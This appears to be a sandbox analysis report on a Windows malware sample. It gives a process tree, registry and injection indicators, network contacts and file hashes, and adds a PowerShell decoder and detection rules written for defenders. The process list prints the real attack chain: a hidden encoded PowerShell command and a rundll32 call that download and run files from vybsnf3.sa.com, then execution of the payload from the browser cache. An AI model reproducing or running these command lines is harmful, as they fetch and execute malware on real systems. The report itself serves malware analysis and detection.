PID 3168 set thread context of 3664 N/A C:\Users\Admin\AppData\Local\micROsOfT\WInDOwS\InEtCAChe\ie\VH4I14XV\jertrs[1].exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe

Enumerates physical storage devices

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\timeout.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\taskkill.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Windows\system32\rundll32.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Windows\system32\rundll32.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000_Classes\Local Settings\MuiCache C:\Windows\system32\rundll32.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Internet Settings\Cache\Content\CacheVersion = "1" C:\Windows\system32\rundll32.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Internet Settings\Cache\Cookies\CacheLimit = "1" C:\Windows\system32\rundll32.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Internet Settings\Cache\History\CachePrefix = "Visited:" C:\Windows\system32\rundll32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Internet Settings\Cache C:\Windows\system32\rundll32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Internet Settings C:\Windows\system32\rundll32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Internet Settings\Cache\Cookies C:\Windows\system32\rundll32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Internet Settings\Cache\History C:\Windows\system32\rundll32.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Internet Settings\Cache\History\CacheVersion = "1" C:\Windows\system32\rundll32.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Internet Settings\Cache\History\CacheLimit = "1" C:\Windows\system32\rundll32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Internet Settings\Cache\Extensible Cache C:\Windows\system32\rundll32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Internet Settings\Cache\Content C:\Windows\system32\rundll32.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Internet Settings\Cache\Content\CachePrefix C:\Windows\system32\rundll32.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Internet Settings\Cache\Content\CacheLimit = "51200" C:\Windows\system32\rundll32.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Internet Settings\Cache\Cookies\CacheVersion = "1" C:\Windows\system32\rundll32.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" C:\Windows\system32\rundll32.exe N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\micROsOfT\WInDOwS\InEtCAChe\ie\VH4I14XV\jertrs[1].exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Windows\system32\rundll32.exe N/A
N/A N/A C:\Windows\system32\rundll32.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\micROsOfT\WInDOwS\InEtCAChe\ie\VH4I14XV\jertrs[1].exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4720 wrote to memory of 4216 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\cmd.exe
PID 4720 wrote to memory of 4216 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\cmd.exe
PID 4216 wrote to memory of 5036 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4216 wrote to memory of 5036 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 5036 wrote to memory of 4740 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 5036 wrote to memory of 4740 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 4740 wrote to memory of 5112 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\DeviceCredentialDeployment.exe
PID 4740 wrote to memory of 5112 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\DeviceCredentialDeployment.exe
PID 4740 wrote to memory of 4020 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\rundll32.exe
PID 4740 wrote to memory of 4020 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\rundll32.exe
PID 4020 wrote to memory of 4944 N/A C:\Windows\system32\rundll32.exe C:\Windows\system32\rundll32.exe
PID 4020 wrote to memory of 4944 N/A C:\Windows\system32\rundll32.exe C:\Windows\system32\rundll32.exe
PID 4740 wrote to memory of 1848 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 4740 wrote to memory of 1848 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 4740 wrote to memory of 1608 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\rundll32.exe
PID 4740 wrote to memory of 1608 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\rundll32.exe
PID 1848 wrote to memory of 3408 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\DeviceCredentialDeployment.exe
PID 1848 wrote to memory of 3408 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\DeviceCredentialDeployment.exe
PID 1848 wrote to memory of 1280 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 1848 wrote to memory of 1280 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 1848 wrote to memory of 1260 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 1848 wrote to memory of 1260 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 4740 wrote to memory of 2636 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 4740 wrote to memory of 2636 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 4740 wrote to memory of 560 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\conhost.exe
PID 4740 wrote to memory of 560 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\conhost.exe
PID 560 wrote to memory of 3168 N/A C:\Windows\system32\conhost.exe C:\Users\Admin\AppData\Local\micROsOfT\WInDOwS\InEtCAChe\ie\VH4I14XV\jertrs[1].exe
PID 560 wrote to memory of 3168 N/A C:\Windows\system32\conhost.exe C:\Users\Admin\AppData\Local\micROsOfT\WInDOwS\InEtCAChe\ie\VH4I14XV\jertrs[1].exe
PID 560 wrote to memory of 3168 N/A C:\Windows\system32\conhost.exe C:\Users\Admin\AppData\Local\micROsOfT\WInDOwS\InEtCAChe\ie\VH4I14XV\jertrs[1].exe
PID 3168 wrote to memory of 3664 N/A C:\Users\Admin\AppData\Local\micROsOfT\WInDOwS\InEtCAChe\ie\VH4I14XV\jertrs[1].exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe
PID 3168 wrote to memory of 3664 N/A C:\Users\Admin\AppData\Local\micROsOfT\WInDOwS\InEtCAChe\ie\VH4I14XV\jertrs[1].exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe
PID 3168 wrote to memory of 3664 N/A C:\Users\Admin\AppData\Local\micROsOfT\WInDOwS\InEtCAChe\ie\VH4I14XV\jertrs[1].exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe
PID 3168 wrote to memory of 3664 N/A C:\Users\Admin\AppData\Local\micROsOfT\WInDOwS\InEtCAChe\ie\VH4I14XV\jertrs[1].exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe

Uses Task Scheduler COM API

persistence

Uses Volume Shadow Copy WMI provider

ransomware

Uses Volume Shadow Copy service COM API

ransomware

outlook_office_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe N/A

outlook_win_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe N/A

Processes

C:\Windows\system32\cmd.exe

cmd /c C:\Users\Admin\AppData\Local\Temp\Photo01.jpg.lnk

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" CmD /C powersHElL -EX bYPASS -nop -w hIddEn -ec IAAgAEkAbgBWAG8AawBlAC0AdwBFAGIAcgBFAFEAdQBlAFMAdAAgAAkALQBVAFIAaQAgAAkAHSBoAHQAdABwADoALwAvAHYAeQBiAHMAbgBmADMALgBzAGEALgBjAG8AbQAvAG0AZQBkAC4AYgBhAHQAHSAgAAkALQBPAFUAVABmAEkAbABFACAAHSAkAEUATgB2ADoAVABlAG0AcABcAGoAcgBiAGIAcwBmAHIALgBiAGEAdAAdICAAOwAgAGkATgB2AG8AawBFAC0ASQB0AGUATQAgAAkAHSAkAEUAbgBWADoAVABlAG0AcABcAGoAcgBiAGIAcwBmAHIALgBiAGEAdAAdIA==

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powersHElL -EX bYPASS -nop -w hIddEn -ec IAAgAEkAbgBWAG8AawBlAC0AdwBFAGIAcgBFAFEAdQBlAFMAdAAgAAkALQBVAFIAaQAgAAkAHSBoAHQAdABwADoALwAvAHYAeQBiAHMAbgBmADMALgBzAGEALgBjAG8AbQAvAG0AZQBkAC4AYgBhAHQAHSAgAAkALQBPAFUAVABmAEkAbABFACAAHSAkAEUATgB2ADoAVABlAG0AcABcAGoAcgBiAGIAcwBmAHIALgBiAGEAdAAdICAAOwAgAGkATgB2AG8AawBFAC0ASQB0AGUATQAgAAkAHSAkAEUAbgBWADoAVABlAG0AcABcAGoAcgBiAGIAcwBmAHIALgBiAGEAdAAdIA==

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\jrbbsfr.bat" "

C:\Windows\system32\DeviceCredentialDeployment.exe

DEVIcECRedentIALdEPLOymEnt

C:\Windows\system32\rundll32.exe

RUNDll32 inEtcpL.CPl , ClearMyTracksByProcess 8

C:\Windows\system32\rundll32.exe

C:\Windows\system32\rundll32.exe C:\Windows\system32\inetcpl.cpl,ClearMyTracksByProcess Flags:8 WinX:0 WinY:0 IEFrame:0000000000000000

C:\Windows\system32\rundll32.exe

rundLl32 C:\Windows\sYStEm32\SHiMGVW.dLl , ImageView_FullscreenA http://vybsnf3.sa.com/jertrs.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Temp\lxRipDbgv6WP.BAT

C:\Windows\system32\DeviceCredentialDeployment.exe

dEvicEcredeNTiAldEPlOYMeNT

C:\Windows\system32\timeout.exe

timEout /T 7 /nObREAK

C:\Windows\system32\taskkill.exe

TAskkilL.Exe /F /Im rUNdlL32.exE

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c DIr C:\Users\Admin\AppData\Local\micROsOfT\WInDOwS\InEtCAChe\ie\ /s /B

C:\Windows\system32\conhost.exe

CoNhOsT C:\Users\Admin\AppData\Local\micROsOfT\WInDOwS\InEtCAChe\ie\VH4I14XV\jertrs[1].exe

C:\Users\Admin\AppData\Local\micROsOfT\WInDOwS\InEtCAChe\ie\VH4I14XV\jertrs[1].exe

C:\Users\Admin\AppData\Local\micROsOfT\WInDOwS\InEtCAChe\ie\VH4I14XV\jertrs[1].exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe"
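The powershell.exe command line above hides stage one behind -EncodedCommand: the argument is base64 over UTF-16LE text, the string delimiters inside it are Unicode right double quotation marks (U+201D, which PowerShell's tokenizer accepts as quotes), tabs pad the arguments, and the cmdlet names are randomly cased. Decoding it by hand is where analysts usually lose the smart-quote detail. The following decoder is an added example written for this page, not code from the sandbox or the report; the only input it uses is the -ec argument copied verbatim from the process list, and the quote-normalisation table is a general one, not something the report states.

```python
import base64
import re

# The "-ec" argument exactly as it appears in the powershell.exe command line above.
ENCODED_COMMAND = "IAAgAEkAbgBWAG8AawBlAC0AdwBFAGIAcgBFAFEAdQBlAFMAdAAgAAkALQBVAFIAaQAgAAkAHSBoAHQAdABwADoALwAvAHYAeQBiAHMAbgBmADMALgBzAGEALgBjAG8AbQAvAG0AZQBkAC4AYgBhAHQAHSAgAAkALQBPAFUAVABmAEkAbABFACAAHSAkAEUATgB2ADoAVABlAG0AcABcAGoAcgBiAGIAcwBmAHIALgBiAGEAdAAdICAAOwAgAGkATgB2AG8AawBFAC0ASQB0AGUATQAgAAkAHSAkAEUAbgBWADoAVABlAG0AcABcAGoAcgBiAGIAcwBmAHIALgBiAGEAdAAdIA=="

# Unicode quotation marks that PowerShell treats as ordinary string delimiters.
# Actors use them because signatures written for ASCII quotes never see the string.
SMART_QUOTES = {
    "\u201c": '"', "\u201d": '"', "\u201e": '"',
    "\u2018": "'", "\u2019": "'", "\u201a": "'",
}


def decode_encoded_command(b64: str) -> str:
    """Reverse PowerShell's -EncodedCommand: base64 wrapped around UTF-16LE text."""
    return base64.b64decode(b64).decode("utf-16-le")


def normalize(script: str) -> str:
    """Fold the layers that break naive matching: Unicode quotes and tab/space padding.
    Casing is left alone; callers compare case-insensitively."""
    for smart, plain in SMART_QUOTES.items():
        script = script.replace(smart, plain)
    return re.sub(r"\s+", " ", script).strip()


def extract_iocs(script: str) -> dict:
    """Pull out what an analyst pivots on: URLs, dropped-file paths and cmdlets used."""
    urls = re.findall(r'https?://[^\s"\';]+', script)
    paths = re.findall(r'\$env:\w+\\[^\s"\';]+', script, flags=re.IGNORECASE)
    cmdlets = sorted({m.lower() for m in re.findall(r"\b[A-Za-z]+-[A-Za-z]+\b", script)})
    return {"urls": urls, "paths": paths, "cmdlets": cmdlets}


def analyse(b64: str) -> dict:
    """Decode, normalise and summarise one -EncodedCommand blob."""
    raw = decode_encoded_command(b64)
    norm = normalize(raw)
    return {
        "raw": raw,
        "normalized": norm,
        # count of Unicode quotes is itself a useful obfuscation indicator
        "smart_quotes": sum(raw.count(q) for q in SMART_QUOTES),
        **extract_iocs(norm),
    }


if __name__ == "__main__":
    result = analyse(ENCODED_COMMAND)
    print(result["normalized"])
    for key in ("smart_quotes", "urls", "paths", "cmdlets"):
        print(f"{key}: {result[key]}")
```

Run against the blob from this report, the normalised script is an Invoke-WebRequest of http://vybsnf3.sa.com/med.bat written to $env:Temp\jrbbsfr.bat followed by Invoke-Item on that file, which matches the cmd.exe /c ""...\Temp\jrbbsfr.bat" " process and the vybsnf3.sa.com:80 connection recorded further down. Feed any other -ec value into analyse() the same way; the decoder does not assume anything about this sample beyond the UTF-16LE encoding that -EncodedCommand always uses.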
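Read top to bottom, the process list is a chain of living-off-the-land steps: hidden encoded PowerShell, DeviceCredentialDeployment.exe to hide the console, rundll32 with inetcpl.cpl,ClearMyTracksByProcess to wipe IE tracks, rundll32 with shimgvw.dll,ImageView_FullscreenA pointed at a URL so the file lands in INetCache, a dir /s /b of INetCache to find the randomly named cache folder, conhost.exe used to launch jertrs[1].exe from that cache, and finally regasm.exe started with no arguments as the injection host (the SetThreadContext and WriteProcessMemory entries above). The following hunting logic is an added example written for this page, not tooling from the sandbox; the event list is constructed from the command lines above, and apart from 4740, 560, 3168 and 3664 the PIDs, the parent of 4740, and the rule names are assumptions of the example.

```python
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str
    cmdline: str


# Constructed sample transcribed from the process list above. Only 4740/560/3168/3664
# are PIDs the report gives; the 100-series PIDs and the parent of 4740 are assumed.
CACHE = r"C:\Users\Admin\AppData\Local\micROsOfT\WInDOwS\InEtCAChe\ie"
EVENTS = [ProcEvent(*t) for t in [
    (100, 1, r"C:\Windows\system32\cmd.exe", r"cmd /c C:\Users\Admin\AppData\Local\Temp\Photo01.jpg.lnk"),
    (101, 100, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "powersHElL -EX bYPASS -nop -w hIddEn -ec IAAgAEkAbgBWAG8AawBl"),  # base64 shortened here
    (102, 101, r"C:\Windows\system32\cmd.exe", r'C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\jrbbsfr.bat" "'),
    (103, 102, r"C:\Windows\system32\DeviceCredentialDeployment.exe", "DEVIcECRedentIALdEPLOymEnt"),
    (104, 102, r"C:\Windows\system32\rundll32.exe", "RUNDll32 inEtcpL.CPl , ClearMyTracksByProcess 8"),
    (105, 102, r"C:\Windows\system32\rundll32.exe",
     r"rundLl32 C:\Windows\sYStEm32\SHiMGVW.dLl , ImageView_FullscreenA http://vybsnf3.sa.com/jertrs.exe"),
    (106, 102, r"C:\Windows\system32\timeout.exe", "timEout /T 7 /nObREAK"),
    (107, 102, r"C:\Windows\system32\taskkill.exe", "TAskkilL.Exe /F /Im rUNdlL32.exE"),
    (4740, 102, r"C:\Windows\system32\cmd.exe", rf"C:\Windows\system32\cmd.exe /c DIr {CACHE}\ /s /B"),
    (560, 4740, r"C:\Windows\system32\conhost.exe", rf"CoNhOsT {CACHE}\VH4I14XV\jertrs[1].exe"),
    (3168, 560, rf"{CACHE}\VH4I14XV\jertrs[1].exe", rf"{CACHE}\VH4I14XV\jertrs[1].exe"),
    (3664, 3168, r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe",
     r'"C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe"'),
]]


def _norm(s: str) -> str:
    """Random casing and 'x , y' spacing are the actor's obfuscation; fold them away."""
    return re.sub(r"\s+", " ", s).strip().lower()


def _img(e: ProcEvent, *names: str) -> bool:
    return e.image.lower().endswith(tuple("\\" + n for n in names))


# Each rule sees the event and its parent (None if the parent is outside the batch).
RULES = {
    # powershell.exe with an encoded command and a hidden window
    "encoded_hidden_powershell": lambda e, p: (
        _img(e, "powershell.exe")
        and re.search(r"\s-(e|ec|enc|encodedcommand)\s", _norm(e.cmdline)) is not None
        and re.search(r"-w(indowstyle)?\s+hidden", _norm(e.cmdline)) is not None),
    # LOLBAS-listed binary whose only use from a batch file is hiding the console window
    "console_hider": lambda e, p: _img(e, "devicecredentialdeployment.exe"),
    # inetcpl.cpl,ClearMyTracksByProcess wipes IE history/cache: anti-forensics
    "ie_tracks_cleared": lambda e, p: _img(e, "rundll32.exe") and "clearmytracksbyprocess" in _norm(e.cmdline),
    # shimgvw.dll!ImageView_FullscreenA given a URL makes rundll32 download it into INetCache
    "shimgvw_url_fetch": lambda e, p: (
        _img(e, "rundll32.exe")
        and re.search(r"shimgvw\.dll\s*,\s*imageview_fullscreena\s+https?://", _norm(e.cmdline)) is not None),
    "taskkill_rundll32": lambda e, p: _img(e, "taskkill.exe") and "/im rundll32.exe" in _norm(e.cmdline),
    # "dir <INetCache> /s /b" locates the cached download inside its randomly named folder
    "inetcache_enumeration": lambda e, p: (
        _img(e, "cmd.exe") and " dir " in _norm(e.cmdline) and "\\inetcache\\" in _norm(e.cmdline)),
    # conhost.exe given a program path runs it (a documented LOLBin use); it normally has no children
    "conhost_launcher": lambda e, p: p is not None and _img(p, "conhost.exe"),
    "exec_from_inetcache": lambda e, p: "\\inetcache\\ie\\" in e.image.lower(),
    # .NET utilities started with no arguments do nothing useful: the classic hollowing host
    "dotnet_utility_no_args": lambda e, p: (
        _img(e, "regasm.exe", "regsvcs.exe", "installutil.exe", "msbuild.exe")
        and e.cmdline.strip().strip('"').lower() == e.image.lower()),
}


def hunt(events):
    """Return (pid, rule_name) pairs; parent lookup is by ppid within the same batch."""
    by_pid = {e.pid: e for e in events}
    return [(e.pid, name) for e in events for name, rule in RULES.items() if rule(e, by_pid.get(e.ppid))]


# Download via rundll32 -> execute from INetCache -> hollow a .NET utility: the sequence seen here.
CHAIN = {"shimgvw_url_fetch", "exec_from_inetcache", "dotnet_utility_no_args"}


def chain_matched(hits) -> bool:
    return CHAIN <= {name for _, name in hits}


if __name__ == "__main__":
    hits = hunt(EVENTS)
    for pid, name in hits:
        print(pid, name)
    print("chain matched:", chain_matched(hits))
```

Every rule normalises casing and spacing first because, as the command lines above show, the dropper randomises both (DEVIcECRedentIALdEPLOymEnt, inEtcpL.CPl , ClearMyTracksByProcess), so matching on the exact strings from one sample would miss the next one. timeout.exe and the unquoted cmd.exe stages produce no hits, which is the point: the individual utilities are all legitimate, and the chain_matched() check is what turns three individually noisy rules into a high-confidence detection.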

Network

Country Destination Domain Proto
US 8.8.8.8:53 vybsnf3.sa.com udp
US 172.93.120.190:80 vybsnf3.sa.com tcp
US 8.8.8.8:53 133.211.185.52.in-addr.arpa udp
US 8.8.8.8:53 189.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 190.120.93.172.in-addr.arpa udp
US 8.8.8.8:53 67.31.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 172.93.120.190:80 vybsnf3.sa.com tcp
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
US 8.8.8.8:53 checkip.dyndns.org udp
DE 193.122.6.168:80 checkip.dyndns.org tcp
US 8.8.8.8:53 reallyfreegeoip.org udp
US 172.67.177.134:443 reallyfreegeoip.org tcp
US 8.8.8.8:53 168.6.122.193.in-addr.arpa udp
US 8.8.8.8:53 134.177.67.172.in-addr.arpa udp
US 8.8.8.8:53 varders.kozow.com udp
FR 51.38.247.67:8081 varders.kozow.com tcp
US 8.8.8.8:53 103.169.127.40.in-addr.arpa udp
US 8.8.8.8:53 56.126.166.20.in-addr.arpa udp
US 8.8.8.8:53 217.135.221.88.in-addr.arpa udp
US 8.8.8.8:53 aborters.duckdns.org udp
NL 91.92.255.235:8081 aborters.duckdns.org tcp
US 8.8.8.8:53 235.255.92.91.in-addr.arpa udp
US 8.8.8.8:53 19.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 173.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 91.16.208.104.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_sjghmla1.n2w.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/5036-5-0x00000198A0FD0000-0x00000198A0FF2000-memory.dmp

memory/5036-10-0x00007FFB658D0000-0x00007FFB66391000-memory.dmp

memory/5036-11-0x000001989EF50000-0x000001989EF60000-memory.dmp

memory/5036-12-0x000001989EF50000-0x000001989EF60000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\jrbbsfr.bat

MD5 885e4bf9c36d1964f751bca33e898503
SHA1 4055100dda8ee3845cfda6735900c556d8c19ca1
SHA256 5efe4bb30df918412651e2060b234aac78f108793c2a25500aca8488ada3ab2a
SHA512 5da165cb4571777b53fbf324dabd63e73b7af94a88d0b08da8a0d28db1f6b947ad41494331be734836d2b5cb7ef090f1eed1e73b8ed9deb2fb9a37c4873691e3

memory/5036-19-0x00007FFB658D0000-0x00007FFB66391000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\lxRipDbgv6WP.BAT

MD5 39aceb0c8a015a4e8f66498e03ff16db
SHA1 4707695dece3a70bfbe55868d059a22e4325eaf0
SHA256 7eec1caeee2e9781635bc00daf1c0dbf98ec325625776afc4fb621e2eabd4527
SHA512 0cc87584d277036c2f94f25484beeb60b07adcb1ccc90b6ddfc1e6521944c35f87cc2c9f15a2b2b453a1cd8e9c0c16ade7d6ceb4f6b082c4be6f8d1aaf8a53dc

C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\VH4I14XV\jertrs[1].exe

MD5 b07832ec5f73ae5f2888ebab2aa5283a
SHA1 cb11a9e432df439fde94b6a3b3677d0112cac3c5
SHA256 dc613f5e91169b3744adfc0f6c968e3501c4bc1221ce12bdaa948ce9e5a1da21
SHA512 7a3233303f57b57e72eaabd792796339611daa39bea2279ff1879a2728afc3b6cbb25cb9b66f96f86deda3aa7fda95cab07f0a549981dddbbb4f71c25132da15

memory/3168-30-0x0000000077C62000-0x0000000077C63000-memory.dmp

memory/3168-32-0x0000000002300000-0x0000000002301000-memory.dmp

memory/3168-36-0x00000000758B0000-0x0000000075A0D000-memory.dmp

memory/3168-38-0x0000000000730000-0x0000000000830000-memory.dmp

memory/3168-40-0x0000000000400000-0x000000000054B000-memory.dmp

memory/3168-42-0x0000000000730000-0x0000000000830000-memory.dmp

memory/3168-43-0x0000000000400000-0x000000000054B000-memory.dmp

memory/3168-44-0x0000000000730000-0x0000000000830000-memory.dmp

memory/3168-45-0x0000000000730000-0x0000000000830000-memory.dmp

memory/3168-46-0x0000000000730000-0x0000000000830000-memory.dmp

memory/3168-47-0x0000000000730000-0x0000000000830000-memory.dmp

memory/3168-48-0x0000000000730000-0x0000000000830000-memory.dmp

memory/3168-54-0x0000000000730000-0x0000000000830000-memory.dmp

memory/3168-52-0x0000000000730000-0x0000000000830000-memory.dmp

memory/3168-56-0x0000000000400000-0x000000000054B000-memory.dmp

memory/3168-58-0x0000000000730000-0x0000000000830000-memory.dmp

memory/3168-59-0x0000000000730000-0x0000000000830000-memory.dmp

memory/3168-62-0x0000000000400000-0x000000000054B000-memory.dmp

memory/3168-64-0x0000000000730000-0x0000000000830000-memory.dmp

memory/3168-66-0x0000000000730000-0x0000000000830000-memory.dmp

memory/3168-68-0x0000000000730000-0x0000000000830000-memory.dmp

memory/3168-70-0x0000000000730000-0x0000000000830000-memory.dmp

memory/3168-71-0x0000000000400000-0x000000000054B000-memory.dmp

memory/3168-72-0x0000000002CF0000-0x0000000002CF8000-memory.dmp

memory/3168-73-0x0000000000730000-0x0000000000830000-memory.dmp

memory/3664-75-0x0000000000400000-0x000000000042B000-memory.dmp

memory/3168-77-0x0000000000730000-0x0000000000830000-memory.dmp

memory/3168-76-0x0000000000730000-0x0000000000830000-memory.dmp

memory/3168-74-0x0000000000730000-0x0000000000830000-memory.dmp

memory/3168-78-0x0000000000400000-0x000000000054B000-memory.dmp

memory/3168-79-0x00000000758B0000-0x0000000075A0D000-memory.dmp

memory/3168-82-0x0000000002CF0000-0x0000000002CF8000-memory.dmp

memory/3664-83-0x0000000000FA0000-0x0000000000FA1000-memory.dmp

memory/3664-81-0x0000000077C62000-0x0000000077C63000-memory.dmp

memory/3664-84-0x0000000000400000-0x0000000000426000-memory.dmp

memory/3664-85-0x0000000074610000-0x0000000074DC0000-memory.dmp

